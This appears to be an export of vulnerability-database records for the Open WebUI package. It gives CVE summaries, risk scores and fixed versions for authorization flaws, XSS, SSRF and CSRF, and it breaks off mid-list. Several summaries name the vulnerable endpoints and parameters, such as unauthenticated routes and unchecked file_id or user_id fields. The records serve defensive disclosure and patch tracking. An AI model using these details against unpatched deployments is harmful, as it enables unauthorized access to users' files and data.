| Affected_by_vulnerabilities |
| 0 |
| url |
VCID-14xt-qwyg-w3cj |
| vulnerability_id |
VCID-14xt-qwyg-w3cj |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the tool_servers and terminal_servers keys in utils/tools.py do use a prefix. When two or more Open WebUI instances share a Redis database (a supported and documented deployment pattern, e.g., for multi-region deployments, blue-green setups, or cluster topologies), the unprefixed keys collide. An admin on Instance A writing to tool_servers overwrites the value read by Instance B — causing Instance B's users to receive Instance A's tool server configuration. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44552, GHSA-3x8w-4f7p-xxc2
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-14xt-qwyg-w3cj |
|
| 1 |
| url |
VCID-1g27-4vq6-7kdz |
| vulnerability_id |
VCID-1g27-4vq6-7kdz |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, Pin/Unpin is a write operation (modifies the message's is_pinned , pinned_by, pinned_at fields), but in standard channels it only checks read permission, allowing users with read-only access to pin/unpin any message. This vulnerability is fixed in 0.9.5. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45386, GHSA-5gc6-xhv4-2wg6
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-1g27-4vq6-7kdz |
|
| 2 |
| url |
VCID-1tu1-b9de-nfaa |
| vulnerability_id |
VCID-1tu1-b9de-nfaa |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, an IDOR vulnerability exists in the Channels feature of Open WebUI, allowing any channel member to modify messages sent by other members (including administrators) within the same channel. In the update_message_by_id function, for group or dm type channels, only the caller's membership in the channel is checked via the is_user_channel_member function, without verifying message ownership. This allows any channel member to modify messages sent by other members within the same channel. This vulnerability is fixed in 0.9.5. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45385, GHSA-wwhq-cx22-f7vv
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-1tu1-b9de-nfaa |
|
| 3 |
| url |
VCID-2rs8-62x1-s7h7 |
| vulnerability_id |
VCID-2rs8-62x1-s7h7 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, the profile_image_url field on the user profile update form accepted arbitrary data: URI values without MIME-type validation, resulting in a XSS vulnerability. This vulnerability is fixed in 0.8.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.8.0 |
| purl |
pkg:pypi/open-webui@0.8.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 4 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 5 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 6 |
| vulnerability |
VCID-4rz6-hw32-jueb |
|
| 7 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 8 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 9 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 10 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 11 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 12 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 13 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 14 |
| vulnerability |
VCID-7nbc-ng1s-suck |
|
| 15 |
| vulnerability |
VCID-8n6u-wgz9-1bgj |
|
| 16 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 17 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 18 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 19 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 20 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 21 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 22 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 23 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 24 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 25 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 26 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 27 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 28 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 29 |
| vulnerability |
VCID-pwsg-72yy-quhk |
|
| 30 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 31 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 32 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 33 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 34 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 35 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 36 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 37 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 38 |
| vulnerability |
VCID-u25g-p4nx-gqd1 |
|
| 39 |
| vulnerability |
VCID-ujye-g4rj-8be5 |
|
| 40 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 41 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 42 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 43 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 44 |
| vulnerability |
VCID-wb88-83cj-ffhy |
|
| 45 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 46 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 47 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 48 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.0 |
|
|
| aliases |
CVE-2026-45299, GHSA-6gh2-q7cp-9qf6
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-2rs8-62x1-s7h7 |
|
| 4 |
| url |
VCID-2xdz-v8cw-fygv |
| vulnerability_id |
VCID-2xdz-v8cw-fygv |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the /responses endpoint in the OpenAI router accepts any authenticated user and forwards requests directly to upstream LLM providers without enforcing per-model access control. While the primary chat completion endpoint (generate_chat_completion) checks model ownership, group membership, and AccessGrants before allowing a request, the /responses proxy only validates that the user has a valid session via get_verified_user. This allows any authenticated user to interact with any model configured on the instance by sending a POST request to /api/openai/responses with an arbitrary model ID. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44556, GHSA-hp5m-24vp-vq2q
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-2xdz-v8cw-fygv |
|
| 5 |
| url |
VCID-32yb-vsfs-43a8 |
| vulnerability_id |
VCID-32yb-vsfs-43a8 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the is_user_channel_member function checks whether a ChannelMember row exists but does not check the is_active field. When a user is deactivated from a group or DM channel (removed by the channel owner, or leaves voluntarily), their membership row persists with is_active=False and status='left'. Because the authorization check ignores this field, the deactivated user retains full read and write access to the channel via direct API calls. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44561, GHSA-hmgr-67hw-j2cq
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-32yb-vsfs-43a8 |
|
| 6 |
| url |
VCID-3436-znsq-guds |
| vulnerability_id |
VCID-3436-znsq-guds |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, any authenticated user with low privileges can enumerate active background tasks across the system and stop tasks belonging to other users via the GET /api/tasks and POST /api/tasks/stop/{task_id} methods. This allows a casual user to disrupt system-wide chat usage by continuously canceling other users' active tasks. This is a real authorization vulnerability affecting integrity and usability in multi-user deployments. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-45399, GHSA-8jjp-r2w2-4v22
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-3436-znsq-guds |
|
| 7 |
| url |
VCID-4rz6-hw32-jueb |
| vulnerability_id |
VCID-4rz6-hw32-jueb |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id). Version 0.8.6 patches the issue. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.8.6 |
| purl |
pkg:pypi/open-webui@0.8.6 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 4 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 5 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 6 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 7 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 8 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 9 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 10 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 11 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 12 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 13 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 14 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 15 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 16 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 17 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 18 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 19 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 20 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 21 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 22 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 23 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 24 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 25 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 26 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 27 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 28 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 29 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 30 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 31 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 32 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 33 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 34 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 35 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 36 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 37 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 38 |
| vulnerability |
VCID-wb88-83cj-ffhy |
|
| 39 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 40 |
| vulnerability |
VCID-yug9-shts-kufb |
|
| 41 |
| vulnerability |
VCID-yysb-dk2k-f7g4 |
|
| 42 |
| vulnerability |
VCID-ze3m-g96u-27fc |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6 |
|
|
| aliases |
CVE-2026-29070, GHSA-26gm-93rw-cchf
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-4rz6-hw32-jueb |
|
| 8 |
| url |
VCID-4v8w-kv6g-kkbc |
| vulnerability_id |
VCID-4v8w-kv6g-kkbc |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, multiple endpoints accept a user-supplied file_id and attach the referenced file to a resource the caller controls (folder knowledge, knowledge-base contents) without verifying that the caller owns or has been granted access to the file. The file's content then becomes reachable through the downstream RAG / file-content paths, allowing any authenticated user to exfiltrate any other user's private file — and on the knowledge-base path, also to overwrite it — given knowledge of the file's UUID. This affects backend/open_webui/routers/folders.py (POST /api/v1/folders/{id}/update), backend/open_webui/routers/knowledge.py (add_file_to_knowledge_by_id), and backend/open_webui/routers/knowledge.py (add_files_to_knowledge_by_id_batch). This vulnerability is fixed in 0.9.5. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45402, GHSA-r472-mw7m-967f
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-4v8w-kv6g-kkbc |
|
| 9 |
| url |
VCID-4x63-8x64-d3bq |
| vulnerability_id |
VCID-4x63-8x64-d3bq |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, a parsing difference between the urlparse and requests libraries led to an SSRF bypass vulnerability. This vulnerability is fixed in 0.9.5. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45400, GHSA-8w7q-q5jp-jvgx
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-4x63-8x64-d3bq |
|
| 10 |
| url |
VCID-5319-t7jm-y3bx |
| vulnerability_id |
VCID-5319-t7jm-y3bx |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, FolderForm uses model_config = ConfigDict(extra='allow'), which permits arbitrary fields to pass through Pydantic validation and be included in model_dump(exclude_unset=True). In insert_new_folder, the server-assigned user_id is placed at the start of the dict and then overwritten by the spread of form data. Because FolderModel declares user_id: str as a real field (not just a form extra), any attacker-supplied user_id in the POST body is accepted by the model and persisted on the Folder row. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44550, GHSA-hr43-rjmr-7wmm
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-5319-t7jm-y3bx |
|
| 11 |
| url |
VCID-5jna-wvd7-j7cm |
| vulnerability_id |
VCID-5jna-wvd7-j7cm |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, GET /api/v1/retrieval/ returns live RAG pipeline configuration to any unauthenticated HTTP client. No Authorization header, cookie, or API key is required. Every adjacent endpoint on the same router (/embedding, /config) is correctly guarded by get_admin_user making this a targeted omission. This vulnerability is fixed in 0.9.5. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45397, GHSA-65pg-qhhw-mxwg
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-5jna-wvd7-j7cm |
|
| 12 |
| url |
VCID-5wfg-zqcy-c7ar |
| vulnerability_id |
VCID-5wfg-zqcy-c7ar |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, an application-wide Cross-Site Request Forgery (CSRF) vulnerability was found Open-WebUl's image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions. This vulnerability is fixed in 0.9.3. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2026-45317, GHSA-j6w6-986j-2m2m
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-5wfg-zqcy-c7ar |
|
| 13 |
| url |
VCID-5wzn-mfwg-ybc3 |
| vulnerability_id |
VCID-5wzn-mfwg-ybc3 |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the channel router does not call filter_allowed_access_grants on either create or update paths. A non-admin user who can create group channels (or who owns a channel) can submit arbitrary access grants — including public wildcard grants — and those grants are stored verbatim, bypassing the admin's permission framework. This vulnerability is fixed in 0.9.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.9.0 |
| purl |
pkg:pypi/open-webui@0.9.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 1 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 2 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 3 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 4 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 5 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 6 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 7 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 8 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 9 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 10 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 11 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 12 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 13 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 14 |
| vulnerability |
VCID-yug9-shts-kufb |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0 |
|
|
| aliases |
CVE-2026-44558, GHSA-7rjh-px4v-5w55
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-5wzn-mfwg-ybc3 |
|
| 14 |
| url |
VCID-66zh-9jk7-9bfx |
| vulnerability_id |
VCID-66zh-9jk7-9bfx |
| summary |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, GET /api/v1/memories/ef is accessible without authentication and executes request.app.state.EMBEDDING_FUNCTION(...). This allows any unauthenticated caller to trigger embedding generation which can lead to direct cost exposure if a paid provider is used. This vulnerability is fixed in 0.8.0. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:pypi/open-webui@0.8.0 |
| purl |
pkg:pypi/open-webui@0.8.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-14xt-qwyg-w3cj |
|
| 1 |
| vulnerability |
VCID-1g27-4vq6-7kdz |
|
| 2 |
| vulnerability |
VCID-1tu1-b9de-nfaa |
|
| 3 |
| vulnerability |
VCID-2xdz-v8cw-fygv |
|
| 4 |
| vulnerability |
VCID-32yb-vsfs-43a8 |
|
| 5 |
| vulnerability |
VCID-3436-znsq-guds |
|
| 6 |
| vulnerability |
VCID-4rz6-hw32-jueb |
|
| 7 |
| vulnerability |
VCID-4v8w-kv6g-kkbc |
|
| 8 |
| vulnerability |
VCID-4x63-8x64-d3bq |
|
| 9 |
| vulnerability |
VCID-5319-t7jm-y3bx |
|
| 10 |
| vulnerability |
VCID-5jna-wvd7-j7cm |
|
| 11 |
| vulnerability |
VCID-5wfg-zqcy-c7ar |
|
| 12 |
| vulnerability |
VCID-5wzn-mfwg-ybc3 |
|
| 13 |
| vulnerability |
VCID-6rbm-rm25-hqgy |
|
| 14 |
| vulnerability |
VCID-7nbc-ng1s-suck |
|
| 15 |
| vulnerability |
VCID-8n6u-wgz9-1bgj |
|
| 16 |
| vulnerability |
VCID-8nzh-cpda-dkca |
|
| 17 |
| vulnerability |
VCID-8y4k-pj2n-8uhm |
|
| 18 |
| vulnerability |
VCID-chug-ma8r-cucc |
|
| 19 |
| vulnerability |
VCID-cw4k-3s8z-uqh8 |
|
| 20 |
| vulnerability |
VCID-dz6g-jgmg-wqce |
|
| 21 |
| vulnerability |
VCID-dzh3-rqx4-fqhv |
|
| 22 |
| vulnerability |
VCID-ef1t-pxjm-j7cz |
|
| 23 |
| vulnerability |
VCID-hj5f-yk3y-ffdg |
|
| 24 |
| vulnerability |
VCID-jfs9-dps1-27a2 |
|
| 25 |
| vulnerability |
VCID-k9jf-5jzd-pkge |
|
| 26 |
| vulnerability |
VCID-n4ma-zcpv-5fbp |
|
| 27 |
| vulnerability |
VCID-nxvm-97r4-6ybz |
|
| 28 |
| vulnerability |
VCID-pkds-1xgn-q3bv |
|
| 29 |
| vulnerability |
VCID-pwsg-72yy-quhk |
|
| 30 |
| vulnerability |
VCID-q682-k826-efhv |
|
| 31 |
| vulnerability |
VCID-qgfh-7u8n-y7c7 |
|
| 32 |
| vulnerability |
VCID-qjt1-zxx8-r7ht |
|
| 33 |
| vulnerability |
VCID-r7vt-4bqm-f7hb |
|
| 34 |
| vulnerability |
VCID-reqw-pfm8-c7g5 |
|
| 35 |
| vulnerability |
VCID-rhhj-rccv-87hw |
|
| 36 |
| vulnerability |
VCID-s625-eg1w-gfd1 |
|
| 37 |
| vulnerability |
VCID-t571-d65a-cyb2 |
|
| 38 |
| vulnerability |
VCID-u25g-p4nx-gqd1 |
|
| 39 |
| vulnerability |
VCID-ujye-g4rj-8be5 |
|
| 40 |
| vulnerability |
VCID-um53-kf7u-kkg6 |
|
| 41 |
| vulnerability |
VCID-vghe-uuzj-m7cu |
|
| 42 |
| vulnerability |
VCID-vkx3-71kv-sugt |
|
| 43 |
| vulnerability |
VCID-w2vd-r3hr-w3bt |
|
| 44 |
| vulnerability |
VCID-wb88-83cj-ffhy |
|
| 45 |
| vulnerability |
VCID-wcz4-vwx4-tufb |
|
| 46 |
